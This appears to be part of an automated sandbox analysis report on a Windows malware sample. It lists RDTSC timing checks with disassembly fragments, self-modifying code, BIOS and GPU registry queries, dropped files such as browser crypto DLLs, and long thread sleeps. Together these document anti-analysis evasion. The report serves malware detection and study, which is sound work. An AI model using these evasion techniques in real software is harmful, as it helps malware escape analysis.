Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A110C second address: 8A1130 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop esi 0x00000011 pop edx 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0148C8B7ADh 0x0000001c rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A1130 second address: 8A113E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0148B58146h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A1538 second address: 8A1548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7ACh 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A1548 second address: 8A158D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F0148B58158h 0x00000014 jmp 00007F0148B58157h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A158D second address: 8A1592 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A1729 second address: 8A172D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A172D second address: 8A1747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0148C8B7AFh 0x00000010 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A1747 second address: 8A174B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A174B second address: 8A1756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A1CEC second address: 8A1CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A21B1 second address: 8A21B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A2827 second address: 8A28A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F0148B58164h 0x0000000f jc 00007F0148B5815Eh 0x00000015 jmp 00007F0148B58158h 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F0148B58148h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov di, 0024h 0x00000039 push 00000000h 0x0000003b and si, C8FCh 0x00000040 push 00000000h 0x00000042 jmp 00007F0148B5814Dh 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 jmp 00007F0148B58154h 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A28A9 second address: 8A28C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0148C8B7A6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0148C8B7AAh 0x00000014 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A28C2 second address: 8A28C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A28C8 second address: 8A28CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A3339 second address: 8A3394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0148B58153h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D34CDh], eax 0x00000016 push 00000000h 0x00000018 adc esi, 5331D2ACh 0x0000001e jmp 00007F0148B58154h 0x00000023 push 00000000h 0x00000025 jmp 00007F0148B58154h 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A4464 second address: 8A4469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A31DD second address: 8A31E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A59B2 second address: 8A59B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A59B6 second address: 8A59BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A59BF second address: 8A59C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A59C5 second address: 8A5A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F0148B58148h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 add dword ptr [ebp+122D1E5Fh], ebx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F0148B58148h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000017h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007F0148B58148h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000016h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007F0148B58151h 0x00000066 pushad 0x00000067 ja 00007F0148B58146h 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A6587 second address: 8A658C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A6F4A second address: 8A6F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A6F4E second address: 8A6F54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A7974 second address: 8A7993 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0148B58150h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A7993 second address: 8A7999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A7999 second address: 8A799D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A799D second address: 8A7A0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F0148C8B7B7h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F0148C8B7A8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov si, 3E47h 0x00000034 add esi, 75E70F21h 0x0000003a xchg eax, ebx 0x0000003b jmp 00007F0148C8B7B1h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jg 00007F0148C8B7A8h 0x00000049 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A3C34 second address: 8A3C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8AA304 second address: 8AA30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0148C8B7A6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 851709 second address: 85170D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 85170D second address: 851713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8AE9EB second address: 8AE9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8AE9F4 second address: 8AEA0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0148C8B7ACh 0x0000000f rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B0FC6 second address: 8B0FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0148B58146h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B0FD0 second address: 8B1045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F0148C8B7A8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 js 00007F0148C8B7A9h 0x00000029 movzx ebx, bx 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D1EDCh] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F0148C8B7A8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 jmp 00007F0148C8B7B1h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jc 00007F0148C8B7A6h 0x0000005f rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B1045 second address: 8B1049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B2082 second address: 8B20F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0148C8B7A8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jmp 00007F0148C8B7AEh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F0148C8B7A8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 and edi, dword ptr [ebp+122D2D28h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F0148C8B7B8h 0x00000054 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B5091 second address: 8B5145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0148B58148h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call 00007F0148B58151h 0x0000002b mov ebx, dword ptr [ebp+122D1D0Eh] 0x00000031 pop ebx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F0148B58148h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D2FDDh] 0x00000054 push 00000000h 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007F0148B58148h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 0000001Ch 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F0148B58151h 0x00000078 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B5FD8 second address: 8B604F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F0148C8B7A8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 or bx, 2E29h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F0148C8B7A8h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 jne 00007F0148C8B7AAh 0x0000004f or dword ptr [ebp+1246050Fh], ecx 0x00000055 push 00000000h 0x00000057 mov dword ptr [ebp+122D39F7h], edi 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jne 00007F0148C8B7A6h 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B604F second address: 8B6054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B6054 second address: 8B605E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0148C8B7A6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B605E second address: 8B6082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F0148B58146h 0x00000016 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B6082 second address: 8B608C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B80EC second address: 8B80FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B81A4 second address: 8B81BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7B5h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8B81BD second address: 8B81C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 41F86B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5D6C7B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Special instruction interceptor: First address: 6EEC6B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Special instruction interceptor: First address: 8BE672 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Special instruction interceptor: First address: 91FC05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 81EC6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 9EE672 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A4FC05 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\DocumentsHDGDGHCAAK.exe

Code function: 9_2_04EC0218 rdtsc

9_2_04EC0218

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5609
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4185

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\System32\svchost.exe TID: 8032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7884	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7884	Thread sleep time: -80040s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596	Thread sleep time: -86043s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7588	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7588	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796	Thread sleep time: -82041s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7908	Thread sleep count: 186 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7908	Thread sleep time: -5580000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7152	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7152	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5720	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5720	Thread sleep time: -92046s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756	Thread sleep time: -84042s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7908	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1860	Thread sleep count: 5609 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456	Thread sleep count: 4185 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6376	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 2924	Thread sleep count: 31 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 2924	Thread sleep time: -31000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7352	Thread sleep count: 259 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7852	Thread sleep count: 39 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7852	Thread sleep time: -39000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1072	Thread sleep count: 32 > 30
Source: C:\Windows\System32\svchost.exe TID: 1072	Thread sleep time: -32000s >= -30000s
